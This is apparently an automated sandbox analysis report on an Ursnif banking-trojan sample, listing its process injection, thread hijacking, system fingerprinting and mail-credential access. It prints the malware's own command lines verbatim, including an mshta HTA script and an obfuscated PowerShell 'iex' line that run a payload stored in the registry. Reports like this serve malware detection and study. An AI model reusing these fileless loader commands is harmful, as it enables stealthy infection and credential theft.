Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: D9724C4000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 26E95750000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: 2B6FC0
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: 3300000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: 2B6FC0

Changes memory attributes in foreign processes to executable or writable

Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFD88E31580 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFD88E31580 protect: page execute read	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFD88E31580 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3440 base: 5EA000 value: 00	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3440 base: 7FFD88E31580 value: EB	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3440 base: 850000 value: 80	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3440 base: 7FFD88E31580 value: 40	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: PID: 3440 base: 5E8000 value: 00	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: PID: 3440 base: 7FFD88E31580 value: EB	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: PID: 3440 base: A90000 value: 80	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: PID: 3440 base: 7FFD88E31580 value: 40	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\lia.exe	Thread register set: target process: 6004	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3440	Jump to behavior
Source: C:\Windows\System32\control.exe	Thread register set: target process: 3440	Jump to behavior
Source: C:\Windows\System32\control.exe	Thread register set: target process: 5360	Jump to behavior
Source: C:\Windows\explorer.exe	Thread register set: target process: 3092
Source: C:\Windows\explorer.exe	Thread register set: target process: 4252
Source: C:\Windows\explorer.exe	Thread register set: target process: 4572
Source: C:\Windows\explorer.exe	Thread register set: target process: 5160
Source: C:\Windows\explorer.exe	Thread register set: target process: 5652

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Jyrg='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Jyrg).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name srwqatl -value gp; new-alias -name aefymkfl -value iex; aefymkfl ([System.Text.Encoding]::ASCII.GetString((srwqatl "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name srwqatl -value gp; new-alias -name aefymkfl -value iex; aefymkfl ([System.Text.Encoding]::ASCII.GetString((srwqatl "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool))	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\lia.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name srwqatl -value gp; new-alias -name aefymkfl -value iex; aefymkfl ([System.Text.Encoding]::ASCII.GetString((srwqatl "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vjag4cgm\vjag4cgm.cmdline	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wvnfnueh\wvnfnueh.cmdline	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES533B.tmp" "c:\Users\user\AppData\Local\Temp\vjag4cgm\CSC876E17C1D4FA4A478F85FCB91E435E.TMP"	Jump to behavior
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES771E.tmp" "c:\Users\user\AppData\Local\Temp\wvnfnueh\CSCD2B2FCBE1BFD4A96A519A01DF502239.TMP"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

Source: control.exe, 00000012.00000000.474269162.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.478873660.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.481304471.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.477227581.000001D870B70000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.544750671.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.496389904.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.522067385.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.491547331.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.493442735.0000000004F80000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.558340773.0000000004F80000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.517558095.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.507991039.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.528128192.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.533591545.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.543082281.00000000083E0000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000021.00000000.584164529.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.579594291.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.564259608.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.568971370.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.589662119.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.573882547.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.598145689.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000002.885370611.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.630073854.0000021910F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.615944125.0000021910F90000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: control.exe, 00000012.00000000.474269162.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.478873660.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.481304471.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.477227581.000001D870B70000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.544750671.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.496389904.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.491157547.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.522067385.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.491547331.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.521122130.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.527432058.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.543730981.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.495158244.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.528128192.0000000000EE0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.584164529.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.579594291.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.564259608.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.568971370.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.589662119.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.573882547.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.598145689.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000002.885370611.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.630073854.0000021910F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.615944125.0000021910F90000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: control.exe, 00000012.00000000.474269162.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.478873660.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.481304471.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.477227581.000001D870B70000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.544750671.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.496389904.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.522067385.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.491547331.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.528128192.0000000000EE0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.584164529.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.579594291.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.564259608.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.568971370.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.589662119.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.573882547.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.598145689.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000002.885370611.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.630073854.0000021910F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.615944125.0000021910F90000.00000002.00020000.sdmp	Binary or memory string: &Program Manager
Source: control.exe, 00000012.00000000.474269162.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.478873660.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.481304471.000001D870B70000.00000002.00020000.sdmp, control.exe, 00000012.00000000.477227581.000001D870B70000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.544750671.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.496389904.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.522067385.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.491547331.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.528128192.0000000000EE0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.584164529.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.579594291.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.564259608.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.568971370.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.589662119.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.573882547.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000000.598145689.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000021.00000002.885370611.0000021DB5F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.630073854.0000021910F90000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.615944125.0000021910F90000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\lia.exe

Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,

1_2_00401AFE

Queries the installation date of Windows

Source: C:\Users\user\Desktop\lia.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\lia.exe

Code function: 1_2_00B142A6 cpuid

1_2_00B142A6

Source: C:\Users\user\Desktop\lia.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\lia.exe

Code function: 1_2_00401C44 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

1_2_00401C44

Source: C:\Users\user\Desktop\lia.exe

Code function: 1_2_00B142A6 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

1_2_00B142A6

Source: C:\Users\user\Desktop\lia.exe

Code function: 1_2_039EC557 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,

1_2_039EC557

Source: C:\Users\user\Desktop\lia.exe

Code function: 1_2_004017A0 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

1_2_004017A0

Stealing of Sensitive Information:

Yara detected Ursnif

Source: Yara match	File source: 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735246636.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461598974.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.887863520.0000021DB7F02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735331530.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.736669788.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735275248.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461428339.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402373531.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402396026.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402348722.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402294438.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735063970.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.885623791.000002DACE802000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402422908.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.482209524.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.576309112.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.574589889.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.572835965.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402435422.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.758280009.0000026E98402000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.482360612.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.409196804.0000000002E5C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461516298.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461458539.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735014776.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735217272.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.482275696.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.734959693.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461491629.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.565242259.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402320891.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735178288.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.404803745.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735119734.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.402410864.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461577321.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.482336864.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461546582.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.572684942.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.572753584.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.890361063.0000021913402000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.572871449.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: lia.exe PID: 7036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 6004, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5360, type: MEMORYSTR
Source: Yara match	File source: 1.3.lia.exe.3008f40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.lia.exe.2f5a4a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.lia.exe.2f5a4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.lia.exe.2fd94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000000.476711224.0000000000520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.642047864.0000021913010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.680268129.000002DACE370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.480249621.0000000000520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.672890506.000002DACE370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.478021133.0000000000520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000000.585135528.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.622062624.00000177102EB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000000.571073263.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.668952654.000002DACE370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.528427153.0000000002CDF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.648717735.0000021913010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.884777631.000002DACE371000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000000.721648561.0000026E98100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.407010476.0000000002F5A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.889460843.0000021DB8A01000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.632217851.0000021913010000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000000.715754515.0000026E98100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000000.569407993.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000000.709079210.0000026E98100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000000.567877818.00000215F47E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.889547397.0000021913011000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.573725665.0000000000521000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.407052672.0000000002FD9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.757780721.0000026E98101000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000000.598890734.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000000.590438554.0000021DB8A00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.574044553.00000215F47E1000.00000020.00020000.sdmp, type: MEMORY

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

Yara detected Ursnif

Source: Yara match	File source: 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735246636.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.461598974.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.887863520.0000021DB7F02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735331530.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.736669788.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.735275248.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
